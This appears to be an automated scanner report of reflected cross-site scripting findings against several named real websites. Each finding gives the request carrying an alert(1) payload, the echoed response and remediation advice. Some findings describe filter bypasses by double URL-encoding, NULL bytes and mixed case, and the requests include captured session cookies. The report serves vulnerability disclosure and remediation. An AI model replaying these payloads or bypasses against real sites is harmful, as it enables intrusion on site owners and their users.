GET /newsletter?uid=90d583b---24cb6"><script>alert(1)</script>78300d896e1 HTTP/1.1 Host: www.astaro.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; __utmz=1.1296493738.1.1.utmcsr=whitepapers.scmagazineuk.com|utmccn=(referral)|utmcmd=referral|utmcct=/astaro; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; __utma=1.546991621.1296493738.1296493738.1296493738.1; __utmc=1; __utmb=112476180.4.10.1296493738;
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Red Hat) Last-Modified: Mon, 31 Jan 2011 18:52:24 GMT Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 58989 Date: Mon, 31 Jan 2011 18:52:32 GMT X-Varnish: 1753030192 Age: 0 Via: 1.1 varnish Connection: close
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="http://www.astaro.com/newsletter?uid=5179dac---24cb6"><script>alert(1)</script>78300d896e1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7a4b"-alert(1)-"dcd72038d6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:f7a4b"-alert(1)-"dcd72038d6b/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2334772668.4074455885.742591488; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Mon, 31 Jan 2011 19:23:30 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31115 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld29 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <!-- s_265.mmxgo=true; s_265.pageName="Page Not Found"; s_265.channel="us.bv"; s_265.trackExternalLinks="true"; s_265.prop1="$|http:f7a4b"-alert(1)-"dcd72038d6b"; s_265.pfxID="bkv"; s_265.disablepihost=false; s_265.prop12="http://www.blackvoices.com/$|http:f7a4b\"-alert(1)-\"dcd72038d6b/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertain ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90b4c</script><script>alert(1)</script>6bd848177d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:/latino.aol.com90b4c</script><script>alert(1)</script>6bd848177d1/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3240247308.903299917.363268352; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Mon, 31 Jan 2011 19:23:31 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31107 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm02 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... Not Found"; s_265.channel="us.bv"; s_265.trackExternalLinks="true"; s_265.prop1="$|http:"; s_265.pfxID="bkv"; s_265.disablepihost=false; s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com90b4c</script><script>alert(1)</script>6bd848177d1/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video"; s_265.linkInternal ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42d86</script><script>alert(1)</script>e73cbe4e8cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:/latino.aol.com/$|.ivillage.com.*42d86</script><script>alert(1)</script>e73cbe4e8cc/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3240378380.3805758285.1186990336; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Mon, 31 Jan 2011 19:23:32 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31107 Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfa82</script><script>alert(1)</script>12dd697aac6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.comcfa82</script><script>alert(1)</script>12dd697aac6/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2393165244.2413314893.1482885632; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Mon, 31 Jan 2011 19:23:33 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31107 Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69562</script><script>alert(1)</script>aa30d423751 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video69562</script><script>alert(1)</script>aa30d423751 HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2393165244.2413314893.1600326144; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Mon, 31 Jan 2011 19:23:35 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31107 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld04 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... |http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video69562</script><script>alert(1)</script>aa30d423751"; s_265.linkInternalFilters="javascript:,aol.com,blackvoices.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of the JSONCallback request parameter is copied into the HTML document as plain text between tags. The payload 3a520<script>alert(1)</script>551eb5a8d72 was submitted in the JSONCallback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ctx request parameter is copied into the HTML document as plain text between tags. The payload a0504<img%20src%3da%20onerror%3dalert(1)>fd0e7e7d201 was submitted in the ctx parameter. This input was echoed as a0504<img src=a onerror=alert(1)>fd0e7e7d201 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5cbc0%253cscript%253ealert%25281%2529%253c%252fscript%253e479a6403fac was submitted in the REST URL parameter 3. This input was echoed as 5cbc0<script>alert(1)</script>479a6403fac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/home/201101270061925cbc0%253cscript%253ealert%25281%2529%253c%252fscript%253e479a6403fac/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming HTTP/1.1 Host: www.businesswire.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>News | Business ...[SNIP]... <span class="epi-error">Cannot find news for id = 201101270061925cbc0<script>alert(1)</script>479a6403fac and language = en.</span> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f984c%253cscript%253ealert%25281%2529%253c%252fscript%253edd66a2a361d was submitted in the REST URL parameter 4. This input was echoed as f984c<script>alert(1)</script>dd66a2a361d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/home/20110127006192/enf984c%253cscript%253ealert%25281%2529%253c%252fscript%253edd66a2a361d/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming HTTP/1.1 Host: www.businesswire.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>News | Business ...[SNIP]... <span class="epi-error">Cannot find news for id = 20110127006192 and language = enf984c<script>alert(1)</script>dd66a2a361d.</span> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c3acb%253cscript%253ealert%25281%2529%253c%252fscript%253e5906f30c114 was submitted in the REST URL parameter 3. This input was echoed as c3acb<script>alert(1)</script>5906f30c114 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/home/20110127006192c3acb%253cscript%253ealert%25281%2529%253c%252fscript%253e5906f30c114/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22 HTTP/1.1 Host: www.businesswire.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>News | Business ...[SNIP]... <span class="epi-error">Cannot find news for id = 20110127006192c3acb<script>alert(1)</script>5906f30c114 and language = en.</span> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 38c53%253cscript%253ealert%25281%2529%253c%252fscript%253ec658d7d2df2 was submitted in the REST URL parameter 4. This input was echoed as 38c53<script>alert(1)</script>c658d7d2df2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/home/20110127006192/en38c53%253cscript%253ealert%25281%2529%253c%252fscript%253ec658d7d2df2/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22 HTTP/1.1 Host: www.businesswire.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>News | Business ...[SNIP]... <span class="epi-error">Cannot find news for id = 20110127006192 and language = en38c53<script>alert(1)</script>c658d7d2df2.</span> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 850ba%253cscript%253ealert%25281%2529%253c%252fscript%253ed36770b8b1f was submitted in the REST URL parameter 3. This input was echoed as 850ba<script>alert(1)</script>d36770b8b1f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/home/20110131005660850ba%253cscript%253ealert%25281%2529%253c%252fscript%253ed36770b8b1f/en/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp HTTP/1.1 Host: www.businesswire.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>News | Business ...[SNIP]... <span class="epi-error">Cannot find news for id = 20110131005660850ba<script>alert(1)</script>d36770b8b1f and language = en.</span> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6cd02%253cscript%253ealert%25281%2529%253c%252fscript%253e52097846f2 was submitted in the REST URL parameter 4. This input was echoed as 6cd02<script>alert(1)</script>52097846f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/home/20110131005660/en6cd02%253cscript%253ealert%25281%2529%253c%252fscript%253e52097846f2/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp HTTP/1.1 Host: www.businesswire.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>News | Business ...[SNIP]... <span class="epi-error">Cannot find news for id = 20110131005660 and language = en6cd02<script>alert(1)</script>52097846f2.</span> ...[SNIP]...
The value of the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8658d"><script>alert(1)</script>1914e400a0c was submitted in the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /portal/site/home/template.BWPOPUP/permalink/?javax.portlet.tpst=c3eb0ec6c81ef7157972709ddb808a0c_ws_MX&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang=en&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_viewID=email_release_popup&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink=http%3A%2F%2Fwww.businesswire.com%2Fnews%2Fhome%2F20110127006192%2Fen%2FVeracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId=201101270061928658d"><script>alert(1)</script>1914e400a0c&beanID=1933350696&viewID=email_release_popup&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken HTTP/1.1 Host: www.businesswire.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;
The value of the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c43fd"><script>alert(1)</script>7d138ca5706 was submitted in the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /portal/site/home/template.BWPOPUP/permalink/?javax.portlet.tpst=c3eb0ec6c81ef7157972709ddb808a0c_ws_MX&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang=enc43fd"><script>alert(1)</script>7d138ca5706&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_viewID=email_release_popup&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink=http%3A%2F%2Fwww.businesswire.com%2Fnews%2Fhome%2F20110127006192%2Fen%2FVeracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId=20110127006192&beanID=1933350696&viewID=email_release_popup&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken HTTP/1.1 Host: www.businesswire.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;
The value of the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c2d9"><script>alert(1)</script>7560c4ee1fb was submitted in the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /portal/site/home/template.BWPOPUP/permalink/?javax.portlet.tpst=c3eb0ec6c81ef7157972709ddb808a0c_ws_MX&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang=en&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_viewID=email_release_popup&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink=http%3A%2F%2Fwww.businesswire.com%2Fnews%2Fhome%2F20110127006192%2Fen%2FVeracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming3c2d9"><script>alert(1)</script>7560c4ee1fb&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId=20110127006192&beanID=1933350696&viewID=email_release_popup&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken HTTP/1.1 Host: www.businesswire.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;
1.130. http://www.dinclinx.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dinclinx.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8110a<script>alert(1)</script>3ce872fd7a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?s=886&e=0&t=635&f=javascript&8110a<script>alert(1)</script>3ce872fd7a6=1 HTTP/1.1 Host: www.dinclinx.com Proxy-Connection: keep-alive Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 17:14:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 31 Jan 2011 17:14:32 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 69
The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1153f"><ScRiPt>alert(1)</ScRiPt>41d7d8c7343 was submitted in the source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /scripts/browse.asp?ref=0080553400&source=1153f"><ScRiPt>alert(1)</ScRiPt>41d7d8c7343 HTTP/1.1 Host: www.ereadable.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 19:32:25 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Content-Length: 14009 Content-Type: text/html Set-Cookie: source=1153f%22%3E%3CScRiPt%3Ealert%281%29%3C%2FScRiPt%3E41d7d8c7343; expires=Tue, 31-Jan-2012 00:00:00 GMT; domain=ereadable.com; path=/ Set-Cookie: SESSION%5FID=7D4CE2DC00000F3600004885A4240069004DBACC; domain=ereadable.com; path=/ Cache-control: private
<html>
<head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>Product not found : eReadable</title>
The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 199c9"-alert(1)-"ce6460bfe43 was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
